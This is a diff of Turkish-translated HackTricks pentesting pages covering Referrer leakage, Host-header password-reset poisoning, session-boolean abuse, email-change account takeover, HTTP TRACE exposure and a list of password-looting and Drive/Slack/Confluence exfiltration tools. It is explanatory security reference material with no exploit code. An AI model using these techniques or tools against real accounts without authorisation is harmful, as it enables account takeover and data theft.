<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi **HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** [**ve HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github depolarına PR'lar gönderin.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,29 +1,29 @@
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
# Referans başlıkları ve politika
# Yönlendirici başlıklar ve politika
Referrer, tarayıcıların önceki ziyaret edilen sayfayı belirtmek için kullandığı başlıktır.
Yönlendirici, tarayıcıların önceki ziyaret edilen sayfayı belirtmek için kullandığı başlıktır.
## Hassas bilgiler sızdırıldı
## Sızdırılan Hassas Bilgiler
Bir web sayfasının içinde herhangi bir noktada GET isteği parametrelerinde hassas bilgi bulunuyorsa, sayfa harici kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcıyı saldırgan tarafından kontrol edilen bir URL'yi ziyaret etmeye ikna edebiliyorsa (sosyal mühendislik), hassas bilgiyi en son GET isteği içinde dışarıya çıkarabilir.
Eğer bir web sayfasının içinde herhangi bir noktada GET isteği parametrelerinde hassas bilgiler bulunuyorsa, sayfa harici kaynaklara bağlantılar içeriyorsa veya bir saldırgan kullanıcıyı saldırganın kontrol ettiği bir URL'yi ziyaret etmeye ikna edebiliyorsa (sosyal mühendislik), hassas bilgileri en son GET isteği içinde dışarıya çıkarabilir.
## Hafifletme
Tarayıcının başka web uygulamalarına hassas bilginin gönderilmesini **önleyebilecek** bir **Yönlendirici politikası** izlemesini sağlayabilirsiniz:
Tarayıcının diğer web uygulamalarına hassas bilgilerin gönderilmesini **önleyebilecek** bir **Referrer politikası** izlemesini sağlayabilirsiniz:
```
Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
@ -46,16 +46,17 @@ Bu kuralı geçersiz kılmak için bir HTML meta etiketi kullanabilirsiniz (sald
Asla URL'deki GET parametreleri veya yollarda hassas veri bulundurmayın.
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olana kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,46 +1,63 @@
# Diğer Web Hileleri
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin**.
* **Hacking hilelerinizi paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking hilelerini paylaşmak için **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek katkıda bulunun.
</details>
### Ana bilgisayar başlığı
Arka uç bazen bazı işlemleri gerçekleştirmek için **Ana Bilgisayar başlığına güvenir**. Örneğin, şifre sıfırlama bağlantısı göndermek için değerini kullanabilir. Bu nedenle, şifrenizi sıfırlamak için bir bağlantı içeren bir e-posta aldığınızda, kullanılan alan, Ana Bilgisayar başlığına koyduğunuz alandır. Sonra, diğer kullanıcıların şifre sıfırlama isteğinde bulunabilir ve alanı kendi kontrolünüzde olan bir alana değiştirerek şifre sıfırlama kodlarını çalabilirsiniz. [ıklama](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
{% hint style="warning" %}
Kullanıcının sıfırlama bağlantısına tıklamasını beklemenize gerek olmadığını unutmayın, çünkü belki de **spam filtreleri veya diğer aracı cihazlar/botlar** bağlantıyı analiz etmek için tıklar.
{% endhint %}
### Oturum boole'ları
### Host başlığı
Bazen doğrulamayı doğru bir şekilde tamamladığınızda, arka uç **oturumunuzdaki bir güvenlik özniteliğine "True" değerini ekleyebilir**. Sonra, farklı bir uç nokta, o kontrolü başarıyla geçip geçmediğinizi bilecektir.\
Ancak, eğer **kontrolü geçerseniz** ve oturumunuz güvenlik özniteliğinde "True" değerini alırsa, **aynı özniteliğe bağlı** ancak **erişim izniniz olmaması gereken diğer kaynaklara erişmeyi deneyebilirsiniz**. [ıklama](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
Arka uç bazen bazı işlemleri gerçekleştirmek için **Host başlığına** güvenir. Örneğin, şifre sıfırlama bağlantısı göndermek için bu değeri kullanabilir. Bu nedenle, şifrenizi sıfırlamak için bir bağlantı içeren bir e-posta aldığınızda, kullanılan alan, Host başlığına koyduğunuz alandır. Sonra, diğer kullanıcıların şifre sıfırlama isteğinde bulunabilir ve alanı kendi kontrolünüzde olan bir alana değiştirerek şifre sıfırlama kodlarını çalabilirsiniz. [Çözüm](https://medium.com/nassec-cybersecurity-writeups/how-i-was-able-to-take-over-any-users-account-with-host-header-injection-546fff6d0f2).
{% hint style="warning" %}
Kullanıcının sıfırlama bağlantısına tıklamasını beklemenize gerek olmadığını unutmamanız önemlidir, çünkü belki de **spam filtreleri veya diğer aracı cihazlar/botlar bunu analiz etmek için tıklar**.
{% endhint %}
### Oturum booleanları
Bazen doğrulamayı doğru bir şekilde tamamladığınızda, arka uç **oturumunuza "True" değerinde bir boolean ekleyebilir**. Sonra, farklı bir uç nokta, o kontrolü başarıyla geçip geçmediğinizi bilecektir.\
Ancak, eğer **kontrolü geçerseniz** ve oturumunuz güvenlik özniteliğinde o "True" değerini alırsa, aynı özniteliğe bağlı **diğer kaynaklara erişmeye çalışabilirsiniz** ama aslında **erişim izniniz olmamalıdır**. [Çözüm](https://medium.com/@ozguralp/a-less-known-attack-vector-second-order-idor-attacks-14468009781a).
### Kayıt işlevselliği
Var olan bir kullanıcı olarak kayıt olmayı deneyin. Noktaları, çok fazla boşluk ve Unicode karakterlerini kullanarak eşdeğer karakterlerle de deneyin.
Zaten var olan bir kullanıcı olarak kayıt olmayı deneyin. Noktaları, çok fazla boşluk ve Unicode karakterlerini kullanarak eşdeğer karakterlerle de deneyin.
### E-postaları ele geçirme
Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, sonra eğer yeni onay e-postası ilk kayıtlı e-postaya gönderilirse, herhangi bir e-postayı ele geçirebilirsiniz. Ya da ikinci e-postayı etkinleştirebilirseniz, ilkini onaylayarak herhangi bir hesabı ele geçirebilirsiniz.
Bir e-posta kaydedin, onaylamadan önce e-postayı değiştirin, sonra eğer yeni onay e-postası ilk kayıtlı e-postaya gönderilirse, herhangi bir e-postayı ele geçirebilirsiniz. Ya da ikinci e-postayı etkinleştirebilir ve ilk e-postayı onaylayabilirseniz, herhangi bir hesabı ele geçirebilirsiniz.
### Şirketlerin iç servis masasına erişim
### Şirketlerin Atlassian'ı kullanan iç destek masasına erişim
{% embed url="https://yourcompanyname.atlassian.net/servicedesk/customer/user/login" %}
### TRACE yöntemi
Geliştiriciler, üretim ortamında çeşitli hata ayıklama seçeneklerini devre dışı bırakmayı unutabilirler. Örneğin, HTTP `TRACE` yöntemi tanısal amaçlar için tasarlanmıştır. Etkinleştirilirse, web sunucusu, `TRACE` yöntemini kullanan isteklere yanıt vererek aldığı tam isteği yanıt olarak yansıtacaktır. Bu davranış genellikle zararsızdır, ancak bazen, ters proxy'ler tarafından isteklere eklenen dahili kimlik doğrulama başlıklarının adını içeren bilgilerin ifşasına yol açabilir.![Gönderi için resim](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
Geliştiriciler, üretim ortamında çeşitli hata ayıklama seçeneklerini devre dışı bırakmayı unutabilirler. Örneğin, HTTP `TRACE` yöntemi tanıgnostik amaçlar için tasarlanmıştır. Etkinleştirilirse, web sunucusu, `TRACE` yöntemini kullanan isteklere, alınan tam isteği yanıt olarak yankılayarak yanıt verecektir. Bu davranış genellikle zararsızdır, ancak bazen, ters proxy'ler tarafından isteklere eklenen dahili kimlik doğrulama başlıklarının adını içeren bilgilerin ifşasına yol açabilir.![Gönderi için resim](https://miro.medium.com/max/60/1\*wDFRADTOd9Tj63xucenvAA.png?q=20)
![Gönderi için resim](https://miro.medium.com/max/1330/1\*wDFRADTOd9Tj63xucenvAA.png)
{% hint style="success" %}
AWS Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'ı öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekleyin</summary>
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* Hacking hilelerini paylaşmak için **HackTricks** ve **HackTricks Cloud** github depolarına PR göndererek katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking hilelerinizi paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
**DNS saldırıları hakkında daha fazla araştırma yapın**

View file

@ -1,27 +1,43 @@
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Sıfırdan kahraman olana kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekle</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
* **Hacking püf noktalarınızı göndererek HackTricks** [**ve HackTricks Cloud**](https://github.com/carlospolop/hacktricks) github depolarına PR gönderin.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
## **Yerel Ganimet**
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Bu betikler, PE vektörlerini aramakla kalmayıp, dosya sistemi içinde hassas bilgileri arayacak.
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne projesi**, yerel bir bilgisayarda depolanan birçok şifreyi almak için kullanılan açık kaynaklı bir uygulamadır. Her yazılım, şifrelerini farklı teknikler kullanarak (düz metin, API'ler, özel algoritmalar, veritabanları vb.) depolar. Bu araç, en yaygın kullanılan yazılımlar için bu şifreleri bulmak amacıyla geliştirilmiştir.
* [**PEASS-ng**](https://github.com/carlospolop/PEASS-ng): Bu betikler, PE vektörlerini aramakla kalmayıp dosya sistemi içinde hassas bilgiler arayacak.
* [**LaZagne**](https://github.com/AlessandroZ/LaZagne): **LaZagne projesi**, yerel bir bilgisayarda depolanan birçok şifreyi almak için kullanılan açık kaynaklı bir uygulamadır. Her yazılım, şifrelerini farklı tekniklerle (açık metin, API'ler, özel algoritmalar, veritabanları vb.) depolar. Bu araç, en yaygın kullanılan yazılımlar için bu şifreleri bulmak amacıyla geliştirilmiştir.
## **Harici Hizmetler**
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Bu Modül, hedefin erişimine sahip olduğunuz Confluence'nin API'sine bağlanacak, PDF'e aktaracak ve Confluence belgelerini indirecek.
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Hedefin Google Drive'ından (saldırganın erişimine sahip olduğu) dosyaları dışa aktarmak için Kırmızı Takım aracı, Google Drive API'si aracılığıyla. Bu, tüm paylaşılan dosyaları, paylaşılan sürücülerden tüm dosyaları ve hedefin erişimine sahip olduğu alan sürücülerinden tüm dosyaları içerir.
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Hedef organizasyonunun Google Kişi Dizinini dışa aktarmak için Kırmızı Takım aracı, Google'ın Kişiler API'si aracılığıyla erişiminiz olan Google Kişi Dizini.
* [**Conf-Thief**](https://github.com/antman1p/Conf-Thief): Bu Modül, hedefin erişimine sahip olduğunuz Confluence API'sine bağlanacak, PDF'ye aktaracak ve hedefin erişimine sahip olduğu Confluence belgelerini indirecek.
* [**GD-Thief**](https://github.com/antman1p/GD-Thief): Red Team aracı, hedefin Google Drive'ından (saldırganın erişimine sahip olduğu) dosyaları Google Drive API'si aracılığıyla dışa aktarmak için kullanılır. Bu, tüm paylaşılan dosyaları, paylaşılan sürücülerden tüm dosyaları ve hedefin erişimine sahip olduğu etki alanı sürücülerinden tüm dosyaları içerir.
* [**GDir-Thief**](https://github.com/antman1p/GDir-Thief): Red Team aracı, erişiminiz olan hedef organizasyonunun Google Kişiler Dizinini Google'ın Kişiler API'si aracılığıyla dışa aktarmak için kullanılır.
* [**SlackPirate**](https://github.com/emtunc/SlackPirate)**:** Bu, bir erişim belirteci verildiğinde bir Slack çalışma alanından 'ilginç' bilgileri çıkarmak için yerel Slack API'lerini kullanan Python'da geliştirilmiş bir araçtır.
* [**Slackhound**](https://github.com/BojackThePillager/Slackhound): Slackhound, bir Slack çalışma alanının/organizasyonunun hızlı bir şekilde keşfedilmesini sağlamak için kırmızı ve mavi takımlar için bir komut satırı aracıdır. Slackhound, bir organizasyonun kullanıcılarını, dosyalarını, mesajlarını vb. hızlı bir şekilde aranabilir hale getirir ve büyük nesneler çevrimdışı inceleme için CSV'ye yazılır.
* [**Slackhound**](https://github.com/BojackThePillager): Slackhound, kırmızı ve mavi takımların hızlı bir şekilde bir Slack çalışma alanının/organizasyonunun keşfini yapmasına olanak tanıyan bir komut satırı aracıdır. Slackhound, bir organizasyonun kullanıcılarını, dosyalarını, mesajlarını vb. hızlı bir şekilde aranabilir hale getirir ve büyük nesneler çevrimdışı inceleme için CSV'ye yazılır.
{% hint style="success" %}
Öğren ve AWS Hacking pratiği yap:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Öğren ve GCP Hacking pratiği yap: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekle</summary>
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol et!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}